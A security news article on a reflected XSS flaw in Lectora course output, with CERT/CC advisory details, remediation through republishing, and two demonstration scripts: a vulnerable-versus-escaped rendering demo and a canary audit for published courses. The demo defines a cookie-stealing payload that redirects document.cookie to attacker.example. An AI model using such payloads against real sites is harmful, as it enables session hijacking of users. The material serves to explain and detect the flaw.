A newly disclosed cross-site scripting (XSS) flaw in ELB Learning’s Lectora course authoring platform enables attackers to inject malicious JavaScript through specially crafted URL parameters.
The vulnerability affects Lectora Desktop (Inspire and Publisher editions) versions 21.0 through 21.3 and Lectora Online versions 7.1.6 and older, potentially exposing high-value clients such as government agencies and large enterprises to session hijacking or user redirection exploits.
The CERT Coordination Center (CERT/CC) has issued Vulnerability Note VU#780141 to raise awareness and emphasize necessary remediation steps.
Vulnerability Details and Impact
Lectora, a widely adopted e-learning development tool, offers both desktop and cloud editions for creating interactive training courses.
| CVE Identifier | Affected Products | Vulnerability |
| --- | --- | --- |
| CVE-2025-9125 | Lectora Desktop 21.0–21.3; Lectora Online ≤ 7.1.6 | XSS via crafted URL parameters: injected JavaScript can display arbitrary alerts, redirect the user to attacker-controlled pages, or steal session cookies. |
When courses are published with Seamless Play Publish (SPP) enabled and the Web Accessibility settings disabled, the published course output reflects URL parameter values into the page without escaping them, so a crafted parameter value can inject JavaScript.
In practice, an attacker could lure a legitimate user into clicking a manipulated course URL, triggering client-side script execution.
This execution could display arbitrary alerts, redirect users to malicious pages, or harvest session cookies—leading to unauthorized access to the learning platform or other connected services.
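The pattern described above, as an added illustrative example rather than Lectora's own player code: a query-string value is concatenated straight into markup (vulnerable), beside the same rendering with the value HTML-escaped (hardened). The parameter name `title`, the `lms.example` and `attacker.example` hosts and the payload are all constructed for the demo; the real parameter name and injection point in Lectora are not stated in the advisory.

```javascript
// Added illustrative example, not Lectora's code. Shows how an unescaped URL
// parameter becomes reflected XSS and what the hardened version looks like.
// Parameter name "title", the hosts and the payload are assumptions.

// Read one query-string parameter from a full course URL.
// URLSearchParams percent-decodes the value, so %3C comes back as "<".
function getParam(courseUrl, name) {
  return new URL(courseUrl).searchParams.get(name);
}

// VULNERABLE: the decoded value is concatenated directly into markup.
// Any "<" in the parameter opens a new tag in the rendered page.
function renderTitleUnsafe(courseUrl) {
  const title = getParam(courseUrl, 'title');
  return `<h1 class="course-title">${title === null ? 'Course' : title}</h1>`;
}

// Escape the five characters that change meaning inside HTML text or
// attribute values, so injected markup survives only as literal text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: same output structure, untrusted value escaped. In a live page the
// equivalent is `el.textContent = title`, which never parses the value as HTML.
function renderTitleSafe(courseUrl) {
  const title = getParam(courseUrl, 'title');
  return `<h1 class="course-title">${escapeHtml(title === null ? 'Course' : title)}</h1>`;
}

// Constructed attacker payload: fires on load, pops an alert, then ships the
// victim's cookies to an attacker host by redirecting (alert, redirect and
// cookie theft are the three outcomes the advisory lists).
const PAYLOAD = `<img src=x onerror="alert(1);location='https://attacker.example/c?'+document.cookie">`;
const BENIGN_URL = 'https://lms.example/courses/intro/index.html?title=Intro%20Course';
const ATTACK_URL = 'https://lms.example/courses/intro/index.html?title=' + encodeURIComponent(PAYLOAD);

// True when the rendered markup still contains a real <img ... onerror=...> tag,
// i.e. the browser would execute the handler.
function containsLiveTag(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

// Render both variants for the benign and the crafted URL.
function demo() {
  return {
    benign: renderTitleUnsafe(BENIGN_URL),
    unsafe: renderTitleUnsafe(ATTACK_URL),
    safe: renderTitleSafe(ATTACK_URL),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The benign URL renders identically through both functions; only the crafted one differs, which is why the flaw goes unnoticed during normal course testing and why published output has to be republished with the fixed player rather than merely re-tested by hand.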
Though the underlying flaw was patched in Lectora Desktop version 21.4, released October 25, 2022, republishing of existing courses was not explicitly required in the accompanying release notes.
As a result, many courses remain vulnerable despite the availability of the patch.
Lectora Online users received the fix automatically on July 20, 2025, in version 7.1.7; however, the requirement to republish existing courses was documented only in the online release notes.
Mitigation and Remediation Steps
To fully remediate the XSS vulnerability, ELB Learning advises all Lectora Desktop customers to download version 21.4 or later from the ELB Learning portal and republish any courses created with earlier software versions.
Failure to republish leaves the vulnerable JavaScript code intact in the course output, undermining the patch.
Lectora Online administrators should ensure that any content published before the July 20, 2025, automatic update is republished using the updated backend to incorporate the fix.
Course authors should also enable the Web Accessibility options where feasible, since the vulnerable output is produced only when that setting is disabled (with Seamless Play Publish enabled).
Where accessibility features conflict with course design requirements, authors must exercise caution and thoroughly test published content for script injection vectors.
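One way to carry out the testing step above across a course inventory, as an added example that is not ELB Learning's tooling: load each published course with a canary value in a URL parameter and check whether the canary is reflected as a live element or only as inert text. Because Desktop output is static files, the reflection happens in client-side script, so the input is assumed to be the rendered DOM (for instance `document.documentElement.outerHTML` captured from a headless browser such as Playwright or Puppeteer), not the raw file on disk. The parameter name `title`, the course paths and the sample markup are constructed for the demo.

```javascript
// Added example, not ELB Learning's tooling: canary-based check for published
// course pages that still reflect a URL parameter without escaping.
// Assumptions: the parameter name, the course paths and the sample renders
// below are constructed; real input is the rendered DOM from a browser.

// A marker unlikely to appear in real course content, wrapped so that an
// unescaped reflection creates a real element in any text or attribute context.
const CANARY = 'lectxss7f3a';
const PROBE = `"><b id="${CANARY}">`;

// Browsers serialise an injected element as <b id="..."></b>; an escaped
// reflection serialises as &lt;b id="..."&gt; and never matches this.
const LIVE_ELEMENT_RE = new RegExp(`<b\\s+id="${CANARY}">`, 'i');

// URL to open in the browser for one course and parameter name.
function buildProbeUrl(courseUrl, paramName) {
  const u = new URL(courseUrl);
  u.searchParams.set(paramName, PROBE);
  return u.toString();
}

// Classify one rendered page:
//   vulnerable       - the probe created a real element (script would run)
//   reflected-inert  - the canary is present but only as text/entities
//   not-reflected    - the parameter is not echoed into this page at all
function classifyReflection(renderedHtml) {
  if (LIVE_ELEMENT_RE.test(renderedHtml)) return 'vulnerable';
  if (renderedHtml.includes(CANARY)) return 'reflected-inert';
  return 'not-reflected';
}

// Return the course keys whose rendered page is classified vulnerable.
function auditCourses(renders) {
  return Object.keys(renders).filter((k) => classifyReflection(renders[k]) === 'vulnerable');
}

// Constructed samples of what a headless browser would hand back for three
// courses: one published before 21.4, one republished with the fix, and one
// page that does not use the parameter.
const SAMPLE_RENDERS = {
  'courses/legacy-21.2':      `<h1 class="title">"&gt;<b id="${CANARY}"></b></h1>`,
  'courses/republished-21.4': `<h1 class="title">&quot;&gt;&lt;b id=&quot;${CANARY}&quot;&gt;</h1>`,
  'courses/no-param':         '<h1 class="title">Course</h1>',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildProbeUrl('https://lms.example/courses/intro/index.html', 'title'));
  console.log(auditCourses(SAMPLE_RENDERS));
}
```

Run the probe URL for every parameter the player reads, not just one, and wait for the player to finish rendering before capturing the DOM; a course that reports `not-reflected` for one parameter name says nothing about the others. Any course that classifies as `vulnerable` should be republished with 21.4 or later (or the 7.1.7 backend) and re-checked.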
Coordinated Disclosure and Acknowledgements
The CERT Coordination Center published VU#780141 on September 22, 2025, to amplify awareness given the platform’s use among sensitive organizations.
The vulnerability was responsibly reported by security researcher Mohammad Jassim and documented by Laurie Tyzenhaus of CERT/CC.
ELB Learning’s public statement acknowledges the limited scope of the issue and reinforces the requirement to republish courses after applying patches, emphasizing the company’s commitment to secure authoring workflows.
Organizations using Lectora are urged to treat this notice as high priority, complete the republishing process without delay, and audit existing course inventories for compliance.
Ensuring that all training materials incorporate the patched code will safeguard users against potential XSS-driven compromises and preserve the integrity of e-learning environments.